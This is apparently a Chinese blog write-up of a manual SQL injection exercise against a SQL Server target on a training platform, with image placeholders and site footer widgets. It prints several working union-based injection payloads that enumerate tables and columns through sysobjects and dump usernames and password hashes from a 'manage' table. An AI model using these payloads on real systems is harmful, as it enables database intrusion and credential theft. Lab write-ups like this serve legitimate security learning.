SQL手工注入漏洞测试(Sql Server数据库)

1.判断注入类型(数字型)
2.判断字段数(4个)
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
3.判断回显(2和3) 这里要注意两个点
1.使用union all
2.字段三的位置是字符
在这里插入图片描述
4.爆库 (使用db_name()函数查询数据库) mozhe_db_v2
在这里插入图片描述
在这里插入图片描述
5.查看表名 xtype=‘u’ :查看用户表
mmsql和mysql语法有点不同,mmsql记录敏感信息的表在sysobjects 中
具体参数请了解以下链接了解:
https://www.cnblogs.com/atree/p/SQL-Server-sysobjects.html
https://blog.csdn.net/jackmacro/article/details/6405871
?id=2 and 1=2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’),‘3’,4
在这里插入图片描述
6.查看是否有其他表 ?id=2 and 1=2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’ and name not in (‘manage’)),‘3’,4
在这里插入图片描述
继续看,发现没有其他表了 ?id=2 and 1=2 union all select 1,(select top 1 name from mozhe_db_v2.dbo.sysobjects where xtype=‘u’ and name not in (‘manage’,‘announcement’)),‘3’,4
在这里插入图片描述
7.查看字段名
?id=2 and 1=2 union all select 1,(select top 1 col_name(object_id(‘manage’),1) from sysobjects),‘3’,4
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
object ():数据库中每个对象都有一个唯一的id值,
object_id(name)可以根据表对象名称得到表对象的ID,object_id()只能返回用户创建的对像的ID,像以sys开头的表都是系统表所以返回不了的

col_name():可以根据id值得到对像的名称,而且可以返回指定下标的结果.

8.爆破,查看内容
?id=2 and 1=2 union all select null,username, password ,null from manage
在这里插入图片描述
9.md5
在这里插入图片描述

在这里插入图片描述

  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值